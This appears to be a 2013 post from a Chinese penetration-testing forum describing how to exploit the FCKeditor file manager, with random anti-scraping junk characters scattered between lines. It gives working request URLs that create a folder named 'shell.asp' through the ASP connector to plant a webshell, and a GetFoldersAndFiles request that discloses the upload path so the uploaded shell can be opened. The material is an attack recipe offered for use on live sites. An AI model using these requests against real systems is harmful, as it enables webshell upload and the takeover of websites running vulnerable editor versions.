中国网络渗透测试联盟
标题:
fckeditor找上传路径方法
[打印本页]
作者:
admin
时间:
2013-10-17 19:37
标题:
fckeditor找上传路径方法
网上流行着是上传是这样子的
, w$ T8 W1 Q$ ]
: U: Z9 P" n3 m% a1 u, K
http://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
, {! D- Q; L1 Y; R6 l8 H( B/ k
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
j6 L j, W- S3 j# z
L c7 U) ?* h- e Z( o+ i! g% l: t1 n
上传后老找不到路径,测了一下,我发现
% I% u7 R1 g6 b/ C
, D# V" K m4 m# Z0 Z+ D
FCKeditor3/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
: \/ l$ _& H) a- O4 g
) s \1 k% ^3 x3 E0 c
可以爆出路径,显示以下内容
% |2 |" {: A7 q' Z( @: q8 v
: w0 I; ^& Z4 C3 i& w: `4 e# g0 J5 N
7 K0 t2 W$ d: m/ b/ |
得出路径,直接打开就见到马子
! Y4 d( X! L# D5 g1 y7 J
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2